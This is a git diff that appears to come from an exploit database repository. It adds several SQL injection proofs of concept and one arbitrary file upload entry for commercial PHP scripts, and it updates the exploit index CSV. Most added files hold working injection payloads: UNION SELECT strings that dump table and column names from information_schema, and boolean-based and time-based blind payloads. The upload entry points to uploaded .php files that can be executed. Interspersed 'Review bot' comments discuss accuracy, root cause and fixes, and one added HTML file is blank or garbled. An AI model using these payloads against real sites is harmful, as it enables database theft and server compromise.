+# -1'++/*!09999UNION*/+/*!09999SELECT*/+0x31,(/*!09999Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!09999table_name*/,0x3c6c693e,2),/*!09999column_name*/,0xa3a,2)),@,2))--+-
+#
+#
+# 2)
+# http://localhost/[PATH]/category_list.php?search=[SQL]
+#
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43310.txt b/exploits/php/webapps/43310.txt
new file mode 100644
index 000000000..ac83b59c2
--- /dev/null
+++ b/exploits/php/webapps/43310.txt
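Review bot: The title names the injectable parameters as 'state_id' and 's', but the second PoC entry uses `category_list.php?search=[SQL]` and records no finding for it, so a reader cannot tell whether the parameter is `s` or `search`, or whether it was confirmed at all. Either align the title with the PoC (`'state_id' / 'search'`) or drop entry 2 until it carries the same kind of evidence the other advisories in this batch give. The index row for 43309 in files_exploits.csv is outside this chunk, so its title should be checked for the same mismatch.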
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: Muslim Matrimonial Script 3.02 - SQL Injection
+# Dork: N/A
+# Date: 10.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/matrimonial-script/
+# Version: 3.02
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# 1)
+# http://localhost/[PATH]/success-story.php?succid=[SQL]
+#
+# -12++/*!04444UNION*/+/*!04444SELECT*/+0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x),0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139--+-
+#
+#
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43311.txt b/exploits/php/webapps/43311.txt
new file mode 100644
index 000000000..dcc6b03ae
--- /dev/null
+++ b/exploits/php/webapps/43311.txt
@@ -0,0 +1,34 @@
+# # # # #
+# Exploit Title: Advanced World Database 2.0.5 - SQL Injection
+# Dork: N/A
+# Date: 10.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/advanced-world-database/
+# Version: 2.0.5
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# 1)
+# http://localhost/[PATH]/city.php?country=[SQL]&state=[SQL]
+# http://localhost/[PATH]/state.php?country=[SQL]
+#
+# Parameter: country (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: country=Russian Federation' AND 6933=6933 AND 'kVcM'='kVcM&state=Moskva
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: country=Russian Federation' AND SLEEP(5) AND 'ZbHT'='ZbHT&state=Moskva
+#
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43312.txt b/exploits/php/webapps/43312.txt
new file mode 100644
index 000000000..b25a15a33
--- /dev/null
+++ b/exploits/php/webapps/43312.txt
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: Resume Clone Script 2.0.5 - SQL Injection
+# Dork: N/A
+# Date: 10.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/resume-builder-script/
+# Version: 2.0.5
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# 1)
+# http://localhost/[PATH]/preview.php?id=[SQL]
+#
+# -2++/*!08888UNION*/(/*!08888SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),0x28313129,0x28313229,0x28313329,0x28313429)--+-
+#
+#
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43314.html b/exploits/php/webapps/43314.html
new file mode 100644
index 000000000..6b97a0f95
--- /dev/null
+++ b/exploits/php/webapps/43314.html
@@ -0,0 +1,29 @@
+ + + +
+ + +
+ + 
\ No newline at end of file
diff --git a/exploits/php/webapps/43315.txt b/exploits/php/webapps/43315.txt
new file mode 100644
index 000000000..6aa947eae
--- /dev/null
+++ b/exploits/php/webapps/43315.txt
@@ -0,0 +1,43 @@
+# # # # #
+# Exploit Title: Vanguard - Marketplace Digital Products PHP 1.4 - Arbitrary File Upload
+# Dork: N/A
+# Date: 11.12.2017
+# Vendor Homepage: https://www.codegrape.com/user/Vanguard/portfolio
+# Software Link: https://www.codegrape.com/item/vanguard-marketplace-digital-products-php/15825
+# Demo: http://vanguard-demo.esy.es/
+# Version: 1.4
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an users upload arbitrary file....
+#
+# Vulnerable Source:
+# .....................
+# $row = $row->fetch(PDO::FETCH_ASSOC);
+# $folder_name = $row['id'] * 2;
+# $folder_name_2 = $folder_name * 5;
+# $check_dir1 = 'uploads/'.$folder_name;
+# $check_dir2 = $check_dir.'/'.$folder_name_2;
+# if (!is_dir($check_dir1)) { mkdir($check_dir1); }
+# if (!is_dir($check_dir2)) { mkdir($check_dir2); }
+# $thumbnail_path = $check_dir1."/".basename($_FILES['thumbnail_file']['name']);
+# $preview_path = $check_dir1."/".basename($_FILES['preview_file']['name']);
+# $main_path = $check_dir2."/".basename($_FILES['main_file']['name']);
+# $error = 0;
+# $upload_path = './';
+# .....................
+#
+# Proof of Concept:
+#
+# Users Add a new product/Add a product preview...
+#
+# http://localhost/[PATH]/
+# http://localhost/[PATH]/uploads/[FOLDER_NAME]/[FILE].php
+#
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43316.txt b/exploits/php/webapps/43316.txt
new file mode 100644
index 000000000..aa67a9970
--- /dev/null
+++ b/exploits/php/webapps/43316.txt
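Review bot: The "Vulnerable Source" excerpt leaves the root cause implicit: the three `basename($_FILES[...]['name'])` paths keep the client-chosen extension and are written under the web-served `uploads/` tree, and nothing in the quoted code checks extension or content type, which is what makes `uploads/[FOLDER_NAME]/[FILE].php` reachable. A one-line description would make that explicit, e.g. `# Root cause: upload name is only passed through basename(); no extension allow-list, and files are stored inside the web root.` The excerpt also builds `$check_dir2` from `$check_dir` rather than `$check_dir1`, so either the vendor code has an undefined-variable bug or the quote was mistyped; worth confirming against the original before it is cited. For anyone triaging this, the fix is an extension/MIME allow-list with server-generated file names and a storage directory that does not execute scripts, and a product-add POST followed by a GET of `uploads/*/*.php` in the web-server log is the detection signal.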
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: Vanguard - Marketplace Digital Products PHP 1.4 - SQL Injection
+# Dork: N/A
+# Date: 11.12.2017
+# Vendor Homepage: https://www.codegrape.com/user/Vanguard/portfolio
+# Software Link: https://www.codegrape.com/item/vanguard-marketplace-digital-products-php/15825
+# Version: 1.4
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# 1)
+# http://localhost/[PATH]/p/[SQL]
+#
+# '++/*!50000UNION*/+/*!50000SELECT*/+1%2c(/*!08888Select*/+export_set(5%2c@:=0%2c(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5%2cexport_set(5%2c@%2c/*!08888table_name*/%2c0x3c6c693e%2c2)%2c/*!08888column_name*/%2c0xa3a%2c2))%2c@%2c2))%2c3%2c4%2c5%2c6%2c7%2c8%2c9%2c10%2c11%2c12%2c13%2c14%2c15%2c16%2c17%2c18%2c19%2c20%2c21%2c22%2c23%2c24%2c25%2c26%2c27%2c28%2c29%2c30%2c31%2c32%2c33--+-
+#
+#
+# # # # #
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 216730a57..e02a43d42 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5763,10 +5763,17 @@ id,file,description,date,author,type,platform,port
 43189,exploits/android/dos/43189.py,"Android Gmail < 7.11.5.176568039 - Directory Traversal in Attachment Download",2017-11-28,"Google Security Research",dos,android,
 43194,exploits/linux/dos/43194.txt,"QEMU - NBD Server Long Export Name Stack Buffer Overflow",2017-11-29,"Eric Blake",dos,linux,
 43199,exploits/linux/dos/43199.c,"Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page",2017-11-30,Bindecy,dos,linux,
+43200,exploits/hardware/dos/43200.py,"MikroTik RouterBoard 6.39.2 / 6.40.5 DNS - Denial of Service",2017-11-30,FarazPajohan,dos,hardware,
 43207,exploits/windows/dos/43207.txt,"Abyss Web Server < 2.11.6 - Heap Memory Corruption",2017-12-01,hyp3rlinx,dos,windows,
 43229,exploits/windows/dos/43229.cs,"Microsoft Windows Defender - Controlled Folder Bypass Through UNC Path",2017-12-07,"Google Security Research",dos,windows,
 43233,exploits/multiple/dos/43233.txt,"Wireshark 2.4.0 < 2.4.2 / 2.2.0 < 2.2.10 - CIP Safety Dissector Crash",2017-12-07,Wireshark,dos,multiple,
 43234,exploits/linux/dos/43234.c,"Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free",2017-12-07,"Mohamed Ghannam",dos,linux,
+43317,exploits/hardware/dos/43317.c,"MikroTik 6.40.5 ICMP - Denial of Service",2017-12-11,FarazPajohan,dos,hardware,
+43320,exploits/multiple/dos/43320.txt,"iOS/macOS - Kernel Double Free due to IOSurfaceRootUserClient not Respecting MIG Ownership Rules",2017-12-11,"Google Security Research",dos,multiple,
+43321,exploits/macos/dos/43321.c,"macOS XNU Kernel - Memory Disclosure due to bug in Kernel API for Detecting Kernel Memory Disclosures",2017-12-11,"Google Security Research",dos,macos,
+43319,exploits/macos/dos/43319.c,"macOS - 'getrusage' Stack Leak Through struct Padding",2017-12-11,"Google Security Research",dos,macos,
+43318,exploits/macos/dos/43318.c,"macOS - 'necp_get_socket_attributes' so_pcb Type Confusion",2017-12-11,"Google Security Research",dos,macos,
+43322,exploits/linux/dos/43322.txt,"LibTIFF pal2rgb 4.0.9 - Heap Buffer Overflow",2017-12-11,"Jungun Baek",dos,linux,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
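Review bot: The six new dos rows are appended out of id order (43317, 43320, 43321, 43319, 43318, 43322), while every surrounding row in this block keeps ascending ids within its type. Re-sorting them as `43317, 43318, 43319, 43320, 43321, 43322` keeps the index greppable and makes future diffs against this section line up. The platform values are consistent with the file paths, so nothing else in the hunk needs attention.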
@@ -38313,8 +38320,36 @@ id,file,description,date,author,type,platform,port
 43281,exploits/php/webapps/43281.txt,"Food Order Script 1.0 - 'list?city' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
 43277,exploits/php/webapps/43277.txt,"E-commerce MLM Software 1.0 - SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,
 43280,exploits/php/webapps/43280.txt,"Facebook Clone Script 1.0 - 'id' / 'send' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
+43278,exploits/php/webapps/43278.txt,"Entrepreneur Dating Script 2.0.1 - 'marital' / 'gender' / 'country' / 'profileid' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,
 43279,exploits/php/webapps/43279.txt,"Event Calendar Category Script 1.0 - 'city' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,
 43283,exploits/php/webapps/43283.txt,"Freelance Website Script 2.0.6 - 'pr_id' / 'catid' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
 43284,exploits/php/webapps/43284.txt,"Hot Scripts Clone 3.1 - 'subctid' / 'mctid' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
 43285,exploits/php/webapps/43285.txt,"Foodspotting Clone Script 1.0 - 'quicksearch.php?q' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
 43286,exploits/php/webapps/43286.txt,"Kickstarter Clone Acript 2.0 - 'projid' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
+43287,exploits/php/webapps/43287.txt,"Secure E-commerce Script 2.0.1 - 'searchcat' / 'searchmain' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
+43288,exploits/php/webapps/43288.txt,"Laundry Booking Script 1.0 - 'list?city' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
+43289,exploits/php/webapps/43289.txt,"Lawyer Search Script 1.1 - 'lawyer-list?city' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
+43290,exploits/php/webapps/43290.txt,"Multivendor Penny Auction Clone Script 1.0 - SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
+43291,exploits/php/webapps/43291.txt,"Online Exam Test Application Script 1.6 - 'exams.php?sort' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
+43292,exploits/php/webapps/43292.html,"Opensource Classified Ads Script 3.2 - SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
+43293,exploits/php/webapps/43293.txt,"PHP Multivendor Ecommerce 1.0 - 'sid' / 'searchcat' / 'chid1' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
+43294,exploits/php/webapps/43294.txt,"Professional Service Script 1.0 - 'service-list?city' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
+43295,exploits/php/webapps/43295.txt,"Readymade PHP Classified Script 3.3 - 'subctid' / 'mctid' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
+43296,exploits/php/webapps/43296.txt,"Readymade Video Sharing Script 3.2 - SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
+43297,exploits/php/webapps/43297.txt,"Responsive Realestate Script 3.2 - 'property-list?tbud' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
+43299,exploits/php/webapps/43299.txt,"Multireligion Responsive Matrimonial 4.7.2 - 'succid' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,
+43300,exploits/php/webapps/43300.txt,"Responsive Events & Movie Ticket Booking Script 3.2.1 - 'findcity.php?q' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,
+43301,exploits/php/webapps/43301.txt,"Multiplex Movie Theater Booking Script 3.1.5 - 'moid' / 'eid' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,
+43302,exploits/php/webapps/43302.txt,"Single Theater Booking Script 3.2.1 - 'findcity.php?q' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,
+43304,exploits/php/webapps/43304.txt,"Advanced Real Estate Script 4.0.7 - SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,
+43305,exploits/php/webapps/43305.txt,"Entrepreneur Bus Booking Script 3.0.4 - 'sourcebus' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,
+43306,exploits/php/webapps/43306.txt,"MLM Forex Market Plan Script 2.0.4 - 'newid' / 'eventid' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,
+43307,exploits/php/webapps/43307.txt,"MLM Forced Matrix 2.0.9 - 'newid' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,
+43308,exploits/php/webapps/43308.txt,"Car Rental Script 2.0.4 - 'val' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,
+43309,exploits/php/webapps/43309.txt,"Groupon Clone Script 3.01 - 'state_id' / 'search' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,
+43310,exploits/php/webapps/43310.txt,"Muslim Matrimonial Script 3.02 - 'succid' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,
+43311,exploits/php/webapps/43311.txt,"Advanced World Database 2.0.5 - SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,
+43312,exploits/php/webapps/43312.txt,"Resume Clone Script 2.0.5 - SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,
+43314,exploits/php/webapps/43314.html,"Basic Job Site Script 2.0.5 - SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,
+43315,exploits/php/webapps/43315.txt,"Vanguard 1.4 - Arbitrary File Upload",2017-12-11,"Ihsan Sencan",webapps,php,
+43316,exploits/php/webapps/43316.txt,"Vanguard 1.4 - SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,